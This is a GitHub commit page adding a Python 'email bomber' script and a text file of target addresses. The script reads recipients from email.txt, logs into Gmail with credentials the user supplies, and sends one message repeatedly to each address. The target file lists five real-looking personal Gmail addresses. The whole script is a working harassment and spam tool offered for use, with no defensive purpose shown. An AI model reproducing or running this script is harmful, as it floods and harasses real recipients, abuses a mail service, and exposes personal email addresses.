Merge pull request #68 from Everydaycodings-Private-codes/master

Created Email_Bomber_version2 Script
This commit is contained in:
Sameer Bhatt (debugger) 2021-05-10 10:03:16 +05:30 committed by GitHub
commit 606d0d4771
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 38 additions and 0 deletions

33
Email_Bomber_Version2.py Normal file
View File

@ -0,0 +1,33 @@
import smtplib
import time
print ("\033[1;31m_________ __ __ ____ ________ __ \033[1;m")
print ("\033[1;34m|########| |##\ /##| /####\ |########| |##| By @everydaycodings \033[1;m")
print ("\033[1;34m|##|____ |###\ __ /###| /##/\##\ |##| |##| Made with code \033[1;m")
print ("\033[1;34m|########| |##| |##| |##| /########\ |##| |##| ____ __ ____ __ ___ \033[1;m")
print ("\033[1;31m|##|_____ |##| |##| /##/ \##\ __|##|__ |##|_______ |__| | | |\/| |__| |__ |__| \033[1;m")
print ("\033[1;31m|########| |##| |##| /##/ \##\ |########| |##########| _|__| |__| | | _|__| |__ | \ \033[1;m")
files = open('email.txt', 'r')
bomb_emails = files.readlines()
email = input("Enter your gmail_address:")
password = input("Enter your gmail_password:")
message = input("Enter Message:")
message_relode = int(input("How many message you want to send?:"))
for bomb_email in bomb_emails:
for x in range(0, message_relode):
mail = smtplib.SMTP('smtp.gmail.com',587)
mail.ehlo()
mail.starttls()
mail.login(email,password)
mail.sendmail(email,bomb_email,message)
print("message sent to {}".format(bomb_email))
time.sleep(1)
mail.close()
files.close()
print("Done")

5
email.txt Normal file
View File

@ -0,0 +1,5 @@
iansarn@gmail.com
ianschramm77@gmail.com
ian.sears1@gmail.com
ian.sheila@gmail.com
ian.sheldon6@gmail.com